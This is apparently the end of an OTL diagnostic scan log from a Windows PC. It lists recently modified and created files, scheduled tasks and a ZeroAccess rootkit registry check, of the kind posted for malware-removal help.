[2014-12-31 16:10:52 | 000,048,739 | ---- | M] () -- C:\Users\BHP\Desktop\10898038_790086454398186_7905267530334111904_n.jpg
[2014-12-30 17:19:30 | 1403,472,541 | ---- | M] () -- C:\Windows\MEMORY.DMP
[2014-12-30 14:30:52 | 000,002,339 | ---- | M] () -- C:\Windows\System32\servers.def.vpx
[2014-12-30 14:30:52 | 000,002,339 | ---- | M] () -- C:\Windows\System32\servers.def.lkg
[2014-12-24 12:07:05 | 000,279,345 | ---- | M] () -- C:\Users\BHP\Documents\Bez nazwy.png
[2014-12-24 12:04:44 | 000,001,501 | ---- | M] () -- C:\Users\BHP\AppData\Local\recently-used.xbel
[2014-12-23 18:19:35 | 017,987,236 | ---- | M] () -- C:\Users\BHP\Documents\clip0020.avi
[2014-12-23 18:17:33 | 016,665,974 | ---- | M] () -- C:\Users\BHP\Documents\clip0019.avi
[2014-12-23 18:17:21 | 013,724,774 | ---- | M] () -- C:\Users\BHP\Documents\clip0018.avi
[2014-12-23 18:15:59 | 015,551,620 | ---- | M] () -- C:\Users\BHP\Documents\clip0017.avi
[2014-12-23 18:14:45 | 045,492,526 | ---- | M] () -- C:\Users\BHP\Documents\clip0016.avi
[2014-12-23 18:12:15 | 036,375,596 | ---- | M] () -- C:\Users\BHP\Documents\clip0015.avi
[2014-12-23 18:11:07 | 047,483,554 | ---- | M] () -- C:\Users\BHP\Documents\clip0014.avi
[2014-12-13 04:33:44 | 000,115,712 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieUnatt.exe
[2014-12-09 19:08:19 | 000,701,104 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\System32\FlashPlayerApp.exe
[2014-12-09 19:08:19 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\System32\FlashPlayerCPLApp.cpl
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

[color=#E56717]========== Files Created - No Company Name ==========[/color]
[2015-01-07 14:45:28 | 000,380,416 | ---- | C] () -- C:\Users\BHP\Desktop\yz2k5433.exe
[2015-01-06 22:16:19 | 000,001,240 | ---- | C] () -- C:\Users\BHP\Desktop\SpyHunter.lnk
[2015-01-06 22:14:56 | 000,019,984 | ---- | C] () -- C:\Windows\System32\drivers\EsgScanner.sys
[2015-01-06 22:09:49 | 000,002,748 | ---- | C] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-5_user.job
[2015-01-06 22:09:46 | 000,002,748 | ---- | C] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-5.job
[2015-01-06 22:09:25 | 000,003,742 | ---- | C] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-1.job
[2015-01-06 22:08:51 | 000,005,820 | ---- | C] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-6.job
[2015-01-06 22:08:47 | 000,005,476 | ---- | C] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-7.job
[2015-01-06 21:29:44 | 000,000,892 | ---- | C] () -- C:\Windows\tasks\globalUpdateUpdateTaskMachineUA.job
[2015-01-06 21:29:42 | 000,000,888 | ---- | C] () -- C:\Windows\tasks\globalUpdateUpdateTaskMachineCore.job
[2014-12-31 16:10:47 | 000,048,739 | ---- | C] () -- C:\Users\BHP\Desktop\10898038_790086454398186_7905267530334111904_n.jpg
[2014-12-30 14:30:52 | 000,002,339 | ---- | C] () -- C:\Windows\System32\servers.def.lkg
[2014-12-30 14:30:51 | 000,002,339 | ---- | C] () -- C:\Windows\System32\servers.def.vpx
[2014-12-24 12:04:44 | 000,001,501 | ---- | C] () -- C:\Users\BHP\AppData\Local\recently-used.xbel
[2014-12-24 12:04:43 | 000,279,345 | ---- | C] () -- C:\Users\BHP\Documents\Bez nazwy.png
[2014-12-23 18:19:24 | 017,987,236 | ---- | C] () -- C:\Users\BHP\Documents\clip0020.avi
[2014-12-23 18:17:23 | 016,665,974 | ---- | C] () -- C:\Users\BHP\Documents\clip0019.avi
[2014-12-23 18:17:13 | 013,724,774 | ---- | C] () -- C:\Users\BHP\Documents\clip0018.avi
[2014-12-23 18:15:53 | 015,551,620 | ---- | C] () -- C:\Users\BHP\Documents\clip0017.avi
[2014-12-23 18:14:23 | 045,492,526 | ---- | C] () -- C:\Users\BHP\Documents\clip0016.avi
[2014-12-23 18:11:54 | 036,375,596 | ---- | C] () -- C:\Users\BHP\Documents\clip0015.avi
[2014-12-23 18:10:41 | 047,483,554 | ---- | C] () -- C:\Users\BHP\Documents\clip0014.avi
[2014-10-21 18:29:36 | 000,004,534 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\CamStudio.cfg
[2014-10-21 18:29:36 | 000,000,408 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\CamShapes.ini
[2014-10-21 18:29:36 | 000,000,408 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\CamLayout.ini
[2014-10-21 18:29:36 | 000,000,051 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\Camdata.ini
[2014-10-21 18:24:06 | 000,000,096 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\version2.xml
[2014-09-07 17:02:49 | 000,000,266 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014-09-01 09:18:44 | 000,002,086 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\WY
[2014-09-01 09:18:44 | 000,001,248 | ---- | C] () -- C:\Users\BHP\AppData\Roaming\DIQRSUU
[2014-06-12 18:06:20 | 000,151,552 | ---- | C] () -- C:\Windows\KMService.exe
[2014-06-12 18:06:20 | 000,008,192 | ---- | C] () -- C:\Windows\System32\srvany.exe
[2014-06-12 17:58:40 | 000,180,632 | ---- | C] () -- C:\Windows\System32\drivers\aswVmm.sys
[2014-06-12 17:58:39 | 000,049,944 | ---- | C] () -- C:\Windows\System32\drivers\aswRvrt.sys
[2014-06-12 17:58:39 | 000,024,184 | ---- | C] () -- C:\Windows\System32\drivers\aswHwid.sys
[2013-05-28 21:22:48 | 000,641,024 | ---- | C] () -- C:\Windows\System32\ficvdec_x86.dll

[color=#E56717]========== ZeroAccess Check ==========[/color]
[2009-07-14 05:42:31 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014-06-25 02:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010-11-20 13:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009-07-14 02:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

< End of report >